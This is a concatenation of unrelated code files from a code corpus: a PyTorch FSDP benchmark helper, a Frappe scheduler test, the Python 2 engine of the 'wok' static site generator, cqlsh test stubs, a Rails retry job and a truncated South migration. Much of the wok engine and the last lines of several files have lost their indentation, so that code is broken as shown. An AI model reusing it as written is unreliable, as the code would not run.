    """Bias-free linear layer written as an explicit matrix multiply."""

    def __init__(self, a, b):
        super().__init__()
        # Weight of shape (a, b); forward computes x @ weight.
        self.weight = nn.Parameter(torch.randn(a, b))

    def forward(self, x):
        return x.mm(self.weight)
class MyModule(torch.nn.Module):
    """Linear layer followed by ReLU; used as the FSDP wrapping unit below."""

    def __init__(self, a, b):
        super().__init__()
        layers = [nn.Linear(a, b), nn.ReLU()]
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        return self.net(x)
class ToyModel(nn.Module):
    """Deep toy MLP whose layer sizes are large enough to make FSDP
    sharding and activation checkpointing meaningful in benchmarks."""

    def __init__(self):
        super().__init__()
        layers = [
            nn.Linear(10, 10000), nn.ReLU(),
            nn.Linear(10000, 10000), nn.ReLU(),
            MyModule(10000, 10000),
            MyModule(10000, 1000),
        ]
        # Seven identical 1000x1000 blocks in the middle of the stack.
        layers.extend(MyModule(1000, 1000) for _ in range(7))
        layers.append(nn.Linear(1000, 5))
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        return self.net(x)
def model_iter_fn(model, example_inputs, collect_outputs=False):
    """Run one training step: forward pass, scalar-ized loss, backward.

    Returns the raw model outputs when ``collect_outputs`` is True
    (used for accuracy comparison); otherwise returns None.
    """
    result = model(*example_inputs)
    reduce_to_scalar_loss(result).backward()
    return result if collect_outputs else None
def get_model(args):
    """Build the benchmark model and its example inputs from ``args``.

    Loads the requested torchbench model when ``args.torchbench_model``
    is set; otherwise falls back to the built-in ToyModel when
    ``args.toy_model`` is set; raises if neither was specified.
    """
    if args.torchbench_model:
        setup_torchbench_cwd()
        module = importlib.import_module(
            f"torchbenchmark.models.{args.torchbench_model}"
        )
        benchmark_cls = getattr(module, "Model", None)
        bm = benchmark_cls(test="train", device=args.device, batch_size=args.batch_size)
        return bm.get_module()
    if args.toy_model:
        return ToyModel(), (torch.randn(20, 10),)
    raise argparse.ArgumentError(
        args.torchbench_model, message="Must specify a model"
    )
def fsdp_checkpointing_base(model, blocks):
    """apply activation checkpointing to model
    returns None as model is updated directly
    """
    # Non-reentrant checkpointing, activations kept on device.
    wrapper = functools.partial(
        checkpoint_wrapper,
        offload_to_cpu=False,
        checkpoint_impl=CheckpointImpl.NO_REENTRANT,
    )
    apply_activation_checkpointing(
        model,
        checkpoint_wrapper_fn=wrapper,
        # Checkpoint every submodule that is an instance of `blocks`.
        check_fn=lambda submodule: isinstance(submodule, blocks),
    )
# Maps a model key to the tuple of submodule classes FSDP should wrap;
# torchbench models are keyed by args.torchbench_model (see apply_fsdp).
MODEL_FSDP_WRAP = {
    "toy_model": (MyModule,),
}
def apply_fsdp(args, model, use_checkpointing=False, use_wrap_policy=True):
    """Wrap `model` in FSDP, optionally with a module wrap policy and
    activation checkpointing, and return the wrapped module."""
    wrap_policy = None
    # Submodule classes to shard; a torchbench model must have an entry in
    # MODEL_FSDP_WRAP or this raises KeyError.
    blocks = MODEL_FSDP_WRAP[
        "toy_model" if model.__class__ is ToyModel else args.torchbench_model
    ]
    if use_wrap_policy:
        wrap_policy = ModuleWrapPolicy(blocks)

    # NOTE(review): use_orig_params=True is presumably required for
    # torch.compile interop with FSDP — confirm against callers.
    model = FSDP(model, auto_wrap_policy=wrap_policy, use_orig_params=True)
    if use_checkpointing:
        fsdp_checkpointing_base(model, blocks)
return model | python | github | https://github.com/pytorch/pytorch | benchmarks/dynamo/dist_util.py |
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies and Contributors
# See license.txt
import frappe
import unittest
from frappe.utils import get_datetime
from frappe.core.doctype.scheduled_job_type.scheduled_job_type import sync_jobs
class TestScheduledJobType(unittest.TestCase):
	"""Tests that Scheduled Job Type docs are synced from hooks and that
	is_event_due() respects each frequency (daily/weekly/monthly/cron)."""

	def setUp(self):
		# Start from a clean slate and re-sync jobs from the installed hooks.
		frappe.db.rollback()
		frappe.db.sql('truncate `tabScheduled Job Type`')
		sync_jobs()
		frappe.db.commit()

	def test_sync_jobs(self):
		all_job = frappe.get_doc('Scheduled Job Type',
			dict(method='frappe.email.queue.flush'))
		self.assertEqual(all_job.frequency, 'All')

		daily_job = frappe.get_doc('Scheduled Job Type',
			dict(method='frappe.email.queue.set_expiry_for_email_queue'))
		self.assertEqual(daily_job.frequency, 'Daily')

		# check if cron jobs are synced
		cron_job = frappe.get_doc('Scheduled Job Type',
			dict(method='frappe.oauth.delete_oauth2_data'))
		self.assertEqual(cron_job.frequency, 'Cron')
		self.assertEqual(cron_job.cron_format, '0/15 * * * *')

		# check if jobs are synced after change in hooks
		updated_scheduler_events = { "hourly": ["frappe.email.queue.flush"] }
		sync_jobs(updated_scheduler_events)
		updated_scheduled_job = frappe.get_doc("Scheduled Job Type", {"method": "frappe.email.queue.flush"})
		self.assertEqual(updated_scheduled_job.frequency, "Hourly")

	def test_daily_job(self):
		# Due once a full day has passed since last_execution.
		job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.email.queue.set_expiry_for_email_queue'))
		job.db_set('last_execution', '2019-01-01 00:00:00')
		self.assertTrue(job.is_event_due(get_datetime('2019-01-02 00:00:06')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:00:06')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-01 23:59:59')))

	def test_weekly_job(self):
		# Due on the next week boundary after last_execution.
		job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.social.doctype.energy_point_log.energy_point_log.send_weekly_summary'))
		job.db_set('last_execution', '2019-01-01 00:00:00')
		self.assertTrue(job.is_event_due(get_datetime('2019-01-06 00:00:01')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-02 00:00:06')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-05 23:59:59')))

	def test_monthly_job(self):
		# Due on the first of the next month after last_execution.
		job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.email.doctype.auto_email_report.auto_email_report.send_monthly'))
		job.db_set('last_execution', '2019-01-01 00:00:00')
		self.assertTrue(job.is_event_due(get_datetime('2019-02-01 00:00:01')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-15 00:00:06')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-31 23:59:59')))

	def test_cron_job(self):
		# runs every 15 mins
		job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.oauth.delete_oauth2_data'))
		job.db_set('last_execution', '2019-01-01 00:00:00')
		self.assertTrue(job.is_event_due(get_datetime('2019-01-01 00:15:01')))
		self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:05:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:14:59'))) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python2
import os
import sys
import shutil
from datetime import datetime
import time
from optparse import OptionParser, OptionGroup
import logging
import fnmatch
import yaml
import wok
from wok.page import Page, Author
from wok import renderers
from wok import util
from wok.dev_server import dev_server
import locale
class Engine(object):
    """
    The main engine of wok. Upon initialization, it generates a site from the
    source files.
    """
    # Built-in defaults; any key of the same name in the site's `wokconfig`
    # (or legacy `config`) YAML file overrides these. See read_options().
    default_options = {
        'content_dir': 'content',
        'template_dir': 'templates',
        'output_dir': 'output',
        'working_dir': 'output.work',
        'create_backup' : False,
        'media_dir': 'media',
        'site_title': 'Some random Wok site',
        'url_pattern': '/{category}/{slug}{page}.{ext}',
        'url_include_index': True,
        'slug_from_filename': False,
        'relative_urls': False,
        'locale': None,
        'markdown_extra_plugins': [],
        'exclude_files': [],
        'rst_doctitle': False,
        'rst_initial_header_level': 1,
        'rst_strip_comments' : True,
        'rst_toc_backlinks' : 'entry',
    }

    # Directory wok was started from; generate_site() chdirs back here on
    # every (re)generation since the dev server changes the cwd.
    SITE_ROOT = os.getcwd()
def __init__(self, output_lvl=1):
"""
Set up CLI options, logging levels, and start everything off.
Afterwards, run a dev server if asked to.
"""
# CLI options
# -----------
parser = OptionParser(version='%prog v{0}'.format(wok.version))
# Add option to to run the development server after generating pages
devserver_grp = OptionGroup(parser, "Development server",
"Runs a small development server after site generation. "
"--address and --port will be ignored if --server is absent.")
devserver_grp.add_option('--server', action='store_true',
dest='runserver',
help="run a development server after generating the site")
devserver_grp.add_option('--address', action='store', dest='address',
help="specify ADDRESS on which to run development server")
devserver_grp.add_option('--port', action='store', dest='port',
type='int',
help="specify PORT on which to run development server")
parser.add_option_group(devserver_grp)
# Options for noisiness level and logging
logging_grp = OptionGroup(parser, "Logging",
"By default, log messages will be sent to standard out, "
"and report only errors and warnings.")
parser.set_defaults(loglevel=logging.WARNING)
logging_grp.add_option('-q', '--quiet', action='store_const',
const=logging.ERROR, dest='loglevel',
help="be completely quiet, log nothing")
logging_grp.add_option('--warnings', action='store_const',
const=logging.WARNING, dest='loglevel',
help="log warnings in addition to errors")
logging_grp.add_option('-v', '--verbose', action='store_const',
const=logging.INFO, dest='loglevel',
help="log ALL the things!")
logging_grp.add_option('--debug', action='store_const',
const=logging.DEBUG, dest='loglevel',
help="log debugging info in addition to warnings and errors")
logging_grp.add_option('--log', '-l', dest='logfile',
help="log to the specified LOGFILE instead of standard out")
parser.add_option_group(logging_grp)
cli_options, args = parser.parse_args()
# Set up logging
# --------------
logging_options = {
'format': '%(levelname)s: %(message)s',
'level': cli_options.loglevel,
}
if cli_options.logfile:
logging_options['filename'] = cli_options.logfile
else:
logging_options['stream'] = sys.stdout
logging.basicConfig(**logging_options)
self.runserver = cli_options.runserver
serverrun_flag = ".server_running"
if os.path.exists(serverrun_flag):
print ""
print "Attention: 'wok --server' seems to be running with this directory as source."
print " Starting another run or instance isn't a good idea..."
print ""
print " You might want to stop the server (via Ctrl-C in it's window)."
print ""
print " If you are sure that there isn't a server instance running,"
print " you should delete file '%s'." % serverrun_flag
print ""
sys.exit(1)
# Action!
# -------
self.generate_site()
# Dev server
# ----------
#todo: Bug: on error (e.g. YAML error) no longer the output_dir is served,
# but the current dir?!?!?!
if cli_options.runserver:
''' Run the dev server if the user said to, and watch the specified
directories for changes. The server will regenerate the entire wok
site if changes are found after every request.
'''
output_dir = self.options['working_dir']
host = '' if cli_options.address is None else cli_options.address
port = 8000 if cli_options.port is None else cli_options.port
server = dev_server(serv_dir=output_dir, host=host, port=port,
dir_mon=True,
watch_dirs=[
self.options['media_dir'],
self.options['template_dir'],
self.options['content_dir']
],
change_handler=self.generate_site)
with open(serverrun_flag, "w") as f:
f.write("")
server.run()
# server.run() leaves in output_dir!?
os.chdir(self.SITE_ROOT)
try:
self.vss_remove(serverrun_flag)
except WindowsError as e:
pass
self.handle_output_dir()
sys.exit(self.error_count)
    def generate_site(self):
        ''' Generate the wok site '''
        # error_count becomes the process exit code (see __init__) and gates
        # whether handle_output_dir() publishes the working dir.
        self.error_count = 0
        # Always (re)generate from the original source root; the dev server
        # leaves the process cwd inside the output directory.
        orig_dir = os.getcwd()
        os.chdir(self.SITE_ROOT)
        self.all_pages = []

        self.read_options()
        self.sanity_check()
        self.load_hooks()
        self.renderer_options()

        self.run_hook('site.start')
        self.prepare_output()
        self.error_count += self.load_pages()
        self.make_tree()
        self.error_count += self.render_site()
        self.run_hook('site.done')
        os.chdir(orig_dir)
def vss_rename(self, src, dest):
""" virus scanner safe os.rename
This problem only applies to Windows!
Some virus scanners (e.g. Avira Antivir) are (badly) locking files during scan
and therefore prevent a rename of them or the containing directory.
A Windows error [5] Access denied is raised then.
One possible workaround is to exclude the problematic directories (here: wok output) from virus scan.
But a better one might be the one below.
It tries several times with a little wait inbetween to rename.
If it doesn't succedd within a few seconds finally an error is raised.
Usually one wait (1/10 second) is enough.
References:
The one with the solution for me:
http://bytes.com/topic/python/answers/516413-intermittent-permission-denied-errors-when-using-os-rename-recently-deleted-path
More interesting finding on the way:
http://stackoverflow.com/questions/3764072/c-win32-how-to-wait-for-a-pending-delete-to-complete
http://bugs.python.org/issue1425127 os.remove OSError: [Errno 13] Permission denied
https://groups.google.com/forum/#!topic/comp.lang.python/8uDyIZQVzJ8
http://mercurial.selenic.com/wiki/UnlinkingFilesOnWindows
http://mercurial.markmail.org/thread/t5ecar6sn3ekifo6 How Mercurial could be made working with Virus Scanners on Windows
https://msdn.microsoft.com/en-us/library/aa363858%28VS.85%29.aspx
http://bz.selenic.com/show_bug.cgi?id=2524 update loses working copy files on Windows for open files
"""
#print "Trying to rename '%s' to '%s' now" %(src, dest)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
os.rename(src, dest)
break
except OSError as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
def vss_remove(self, f):
""" virus scanner safe os.remove
"""
#print "Trying to remove '%s' now" %(f)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
os.remove(f)
break
except (OSError, WindowsError) as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
def vss_rmtree(self, d):
""" virus scanner safe shutil.rmtree
"""
#print "Trying to remove directory tree '%s' now" %(d)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
shutil.rmtree(d)
break
except (WindowsError, OSError) as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
    def handle_output_dir(self):
        # Publish the freshly generated working dir as the real output dir,
        # but only on a clean run: on errors the previous output is kept so
        # a broken build never clobbers the last good site.
        if self.error_count == 0:
            os.chdir(self.SITE_ROOT)
            # Drop the previous backup, then either back up or remove the
            # current output before moving the working dir into place.
            if os.path.isdir(self.options['output_dir']+'.bak'):
                self.vss_rmtree(self.options['output_dir']+'.bak')
            if os.path.isdir(self.options['output_dir']):
                if self.options['create_backup']:
                    # This rename (the original os.rename()) wasn't a problem,
                    # but using the safe call here too now.
                    self.vss_rename(self.options['output_dir'], self.options['output_dir']+'.bak')
                else:
                    #another tried workaround for the virus scanner problem. Didn't help.
                    #tmpname = self.options['output_dir']+'.del'+ datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
                    #print "Renaming output to", tmpname, " - as bughandling"
                    #os.rename(self.options['output_dir'], tmpname)
                    ##print "and delete it then"
                    ##shutil.rmtree(tmpname)
                    self.vss_rmtree(self.options['output_dir'])

            #if os.path.isdir(self.options['output_dir']):
            #    print self.options['output_dir'], "found"
            #else:
            #    print "NO", self.options['output_dir'], "found"
            #
            #if os.path.isdir(self.options['working_dir']):
            #    print self.options['working_dir'], "found"
            #else:
            #    print "NO", self.options['working_dir'], "found"

            # Here the originally used os.rename() often failed on Windows.
            # See documentation in vss_rename().
            self.vss_rename(self.options['working_dir'], self.options['output_dir'])
        else:
            print ""
            print "Result:"
            print "Due to errors there has no (new) output directory '%s' been created!" % (self.options['output_dir'])
            print "The files are still in '%s' and the last successful run remains in '%s'." % (self.options['working_dir'], self.options['output_dir'])
    def read_options(self):
        """Load options from the config file."""
        self.options = Engine.default_options.copy()

        # Prefer the new `wokconfig` file name; fall back to legacy `config`.
        # NOTE(review): the deprecation warning below fires even when no
        # legacy `config` file exists at all — confirm whether intended.
        if os.path.isfile('wokconfig'):
            with open('wokconfig') as f:
                yaml_config = yaml.load(f)
            if yaml_config:
                self.options.update(yaml_config)
        else:
            logging.warn("Deprecation: You are still using the old config file name 'config'."
                " The preferred new name is 'wokconfig'.")
            if os.path.isfile('config'):
                with open('config') as f:
                    yaml_config = yaml.load(f)
                if yaml_config:
                    self.options.update(yaml_config)

        # Make authors a list, even only a single author was specified.
        # NOTE(review): on Python 2, YAML may yield `unicode` rather than
        # `str`, in which case this isinstance(..., str) branch is skipped
        # and a single-author string stays unparsed — confirm.
        authors = self.options.get('authors', self.options.get('author', None))
        if isinstance(authors, list):
            self.options['authors'] = [Author.parse(a) for a in authors]
        elif isinstance(authors, str):
            csv = authors.split(',')
            self.options['authors'] = [Author.parse(a) for a in csv]
            if len(self.options['authors']) > 1:
                logging.warn('Deprecation Warning: Use YAML lists instead of '
                    'CSV for multiple authors. i.e. ["John Doe", "Jane '
                    'Smith"] instead of "John Doe, Jane Smith". In wokconfig '
                    'file.')

        # Make exclude_files a list, even only a single pattern was specified.
        exclude_files = self.options.get('exclude_files', None)
        if isinstance(exclude_files, str):
            self.options['exclude_files'] = [e.strip() for e in exclude_files.split(',')]
            if len(self.options['exclude_files']) > 1:
                logging.warn('Deprecation Warning: Use YAML lists instead of '
                    'CSV for multiple file exclusions. i.e. ["*.ignore", '
                    '"__*"] instead of "*.ignore , __*" in wokconfig file.')

        if '{type}' in self.options['url_pattern']:
            logging.warn('Deprecation Warning: You should use {ext} instead '
                'of {type} in the url pattern specified in the wokconfig '
                'file.')

        # Set locale if needed
        wanted_locale = self.options.get('locale')
        if wanted_locale is not None:
            try:
                locale.setlocale(locale.LC_TIME, wanted_locale)
            except locale.Error as err:
                logging.warn('Unable to set locale to `%s`: %s',
                    wanted_locale, err
                )

        # make sure that output_dir is always only a name, not any path!
        outdir = os.path.basename(self.options['output_dir'].strip("./"))
        if outdir != self.options['output_dir']:
            logging.error("Option 'output_dir' must not contain a path (%s), "
                          "only a directory name! Stripped it down to '%s'."
                          % (self.options['output_dir'], outdir))
            self.options['output_dir'] = outdir

        # add a subdir prefix to the output_dir, if present in the config
        self.options['server_root'] = self.options['output_dir']
        if self.options.get('url_subdir', ''):
            self.options['output_dir'] = os.path.join(self.options['output_dir'], self.options['url_subdir'])
def renderer_options(self):
"""Monkeypatches renderer options as in `wokconfig` file."""
# Markdown extra plugins
markdown_extra_plugins = \
self.options.get('markdown_extra_plugins', [])
if hasattr(renderers, 'Markdown'):
renderers.Markdown.plugins.extend(markdown_extra_plugins)
if hasattr(renderers, 'Markdown2'):
renderers.Markdown2.extras.extend(markdown_extra_plugins)
# reStructuredText options
if hasattr(renderers, 'ReStructuredText'):
renderers.ReStructuredText.options.update( \
{'doctitle' : self.options.get('rst_doctitle', False), \
'initial_header_level' : self.options.get('rst_initial_header_level', 1),
'strip_comments' : self.options.get('rst_strip_comments', True),
'toc_backlinks' : self.options.get('rst_toc_backlinks', 'entry'),
})
def sanity_check(self):
"""Basic sanity checks."""
# Make sure that this is (probabably) a wok source directory.
if not (os.path.isdir('templates') or os.path.isdir('content')):
logging.critical("This doesn't look like a wok site. Aborting.")
sys.exit(1)
def load_hooks(self):
try:
sys.path.append('hooks')
import __hooks__
self.hooks = __hooks__.hooks
logging.info('Loaded {0} hooks: {0}'.format(self.hooks))
except ImportError as e:
if "__hooks__" in str(e):
logging.info('No hooks module found.')
else:
# don't catch import errors raised within a hook
logging.info('Import error within hooks.')
raise
def run_hook(self, hook_name, *args):
""" Run specified hooks if they exist """
logging.debug('Running hook {0}'.format(hook_name))
returns = []
try:
for hook in self.hooks.get(hook_name, []):
returns.append(hook(self.options, *args))
except AttributeError:
logging.info('Hook {0} not defined'.format(hook_name))
return returns
def prepare_output(self):
"""
Prepare the output/working directory.
Remove any contents already there,
and then copy over the media files, if they exist.
"""
output_dir = self.options['working_dir']
if os.path.isdir(output_dir):
for name in os.listdir(output_dir):
# Don't remove dotfiles #todo: why? What about copying from output_dir?
if name[0] == ".":
continue
path = os.path.join(output_dir, name)
if os.path.isfile(path):
self.vss_remove(path)
else:
self.vss_rmtree(path)
else:
os.makedirs(output_dir)
self.run_hook('site.output.pre', output_dir)
# Copy the media directory to the output folder
if os.path.isdir(self.options['media_dir']):
try:
for name in os.listdir(self.options['media_dir']):
path = os.path.join(self.options['media_dir'], name)
if os.path.isdir(path):
shutil.copytree(
path,
os.path.join(output_dir, name),
symlinks=True
)
else:
shutil.copy(path, output_dir)
# Do nothing if the media directory doesn't exist
except OSError:
logging.warning('There was a problem copying the media files '
'to the output directory.')
self.run_hook('site.output.post', output_dir)
def load_pages(self):
"""Load all the content files."""
error_count = 0
# Load pages from hooks (pre)
for pages in self.run_hook('site.content.gather.pre'):
if pages:
self.all_pages.extend(pages)
# Load files
for root, dirs, files in os.walk(self.options['content_dir']):
# Grab all the parsable files
for f in files:
# Don't parse hidden files.
if f.startswith('.'):
continue
# Don't parse excluded files.
if self.options['exclude_files']:
exclude_it = False
for exf in self.options['exclude_files']:
if fnmatch.fnmatch(f, exf):
logging.info('File ignored due to user exclusion: {0}'.format(f))
exclude_it = True
break
if exclude_it:
continue
ext = f.split('.')[-1]
renderer = renderers.Plain
for r in renderers.all:
if ext in r.extensions:
renderer = r
break
else:
logging.warning('No parser found '
'for {0}. Using default renderer.'.format(f))
renderer = renderers.Renderer
p = Page.from_file(os.path.join(root, f), self.options, self, renderer)
if p and p.errorlog:
error_count += 1
print "ERRORS in", p.filename
for line in p.errorlog:
print " ", line
print
p.errorlog = [] # clear for next stage!
if p and p.meta['published']:
self.all_pages.append(p)
# Load pages from hooks (post)
for pages in self.run_hook('site.content.gather.post', self.all_pages):
if pages:
self.all_pages.extend(pages)
return error_count
def make_tree(self):
"""
Make the category pseudo-tree.
In this structure, each node is a page. Pages with sub pages are
interior nodes, and leaf nodes have no sub pages. It is not truly a
tree, because the root node doesn't exist.
"""
self.categories = {}
site_tree = []
# We want to parse these in a approximately breadth first order
self.all_pages.sort(key=lambda p: len(p.meta['category']))
# For every page
for p in self.all_pages:
# If it has a category (ie: is not at top level)
if len(p.meta['category']) > 0:
top_cat = p.meta['category'][0]
if not top_cat in self.categories:
self.categories[top_cat] = []
self.categories[top_cat].append(p.meta)
try:
# Put this page's meta in the right place in site_tree.
siblings = site_tree
for cat in p.meta['category']:
# This line will fail if the page is an orphan
parent = [subpage for subpage in siblings
if subpage['slug'] == cat][0]
siblings = parent['subpages']
siblings.append(p.meta)
except IndexError:
logging.error('It looks like the page "{0}" is an orphan! '
'This will probably cause problems.'.format(p.path))
def render_site(self):
"""Render every page and write the output files."""
error_count = 0
logging.info("****************** render_site")
# Gather tags
tag_set = set()
for p in self.all_pages:
tag_set = tag_set.union(p.meta['tags'])
tag_dict = dict()
for tag in tag_set:
# Add all pages with the current tag to the tag dict
tag_dict[tag] = [p.meta for p in self.all_pages
if tag in p.meta['tags']]
# Gather slugs
slug_dict = dict((p.meta['slug'], p.meta) for p in self.all_pages)
for p in self.all_pages:
# Construct this every time, to avoid sharing one instance
# between page objects.
templ_vars = {
'site': {
'title': self.options.get('site_title', 'Untitled'),
'datetime': datetime.now(),
'date': datetime.now().date(),
'time': datetime.now().time(),
'tags': tag_dict,
'pages': self.all_pages[:],
'categories': self.categories,
'slugs': slug_dict,
},
}
for k, v in self.options.iteritems():
if k not in ('site_title', 'output_dir', 'content_dir',
'working_dir', 'create_backup', 'templates_dir',
'media_dir', 'url_pattern'):
templ_vars['site'][k] = v
if 'author' in self.options:
templ_vars['site']['author'] = self.options['author']
if self.runserver:
templ_vars['site']['base'] = '<base href="">'
else:
templ_vars['site']['base'] = '<base href="%s">' % self.options.get("base", "")
# Rendering the page might give us back more pages to render.
new_pages = p.render(templ_vars)
if p and p.errorlog:
error_count += 1
print "ERRORS while working on", p.filename
for line in p.errorlog:
print " ", line
p.errorlog = [] # just cleanup
if p.meta['make_file']:
p.write()
if new_pages:
logging.debug('found new_pages')
self.all_pages += new_pages
return error_count
if __name__ == '__main__':
Engine()
exit(0) | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# to configure behavior, define $CQL_TEST_HOST to the destination address
# for Thrift connections, and $CQL_TEST_PORT to the associated port.
from .basecase import BaseTestCase
class TestCqlshInvocation(BaseTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_normal_run(self):
pass
def test_python_interpreter_location(self):
pass
def test_color_capability_detection(self):
pass
def test_colored_output(self):
pass
def test_color_cmdline_option(self):
pass
def test_debug_option(self):
pass
def test_connection_args(self):
pass
def test_connection_config(self):
pass
def test_connection_envvars(self):
pass
def test_command_history(self):
pass
def test_missing_dependencies(self):
pass
def test_completekey_config(self):
pass
def test_ctrl_c(self):
pass
def test_eof(self):
pass
def test_output_encoding_detection(self):
pass
def test_output_encoding(self):
pass
def test_retries(self):
pass | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
class BeforeEnqueueError < StandardError; end
class RetriesJob < ActiveJob::Base
attr_accessor :raise_before_enqueue
# The job fails in before_enqueue the first time it retries itself.
before_perform do
self.raise_before_enqueue = true
end
# The job fails once to enqueue/retry itself, then succeeds.
before_enqueue do
raise BeforeEnqueueError if raise_before_enqueue
ensure
@raise_before_enqueue = false
end
# The job retries on BeforeEnqueueError errors.
retry_on BeforeEnqueueError
def perform
retry_job if executions <= 1
end
end | ruby | github | https://github.com/rails/rails | activejob/test/jobs/retries_job.rb |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'UserProfile.name'
db.alter_column('auth_userprofile', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['name']
db.create_index('auth_userprofile', ['name'])
# Changing field 'UserProfile.language'
db.alter_column('auth_userprofile', 'language', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['language']
db.create_index('auth_userprofile', ['language'])
# Changing field 'UserProfile.courseware'
db.alter_column('auth_userprofile', 'courseware', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'UserProfile.meta'
db.alter_column('auth_userprofile', 'meta', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'UserProfile.location'
db.alter_column('auth_userprofile', 'location', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['location']
db.create_index('auth_userprofile', ['location'])
def backwards(self, orm):
# Removing index on 'UserProfile', fields ['location']
db.delete_index('auth_userprofile', ['location'])
# Removing index on 'UserProfile', fields ['language']
db.delete_index('auth_userprofile', ['language'])
# Removing index on 'UserProfile', fields ['name']
db.delete_index('auth_userprofile', ['name'])
# Changing field 'UserProfile.name'
db.alter_column('auth_userprofile', 'name', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.language'
db.alter_column('auth_userprofile', 'language', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.courseware'
db.alter_column('auth_userprofile', 'courseware', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.meta'
db.alter_column('auth_userprofile', 'meta', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.location'
db.alter_column('auth_userprofile', 'location', self.gf('django.db.models.fields.TextField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
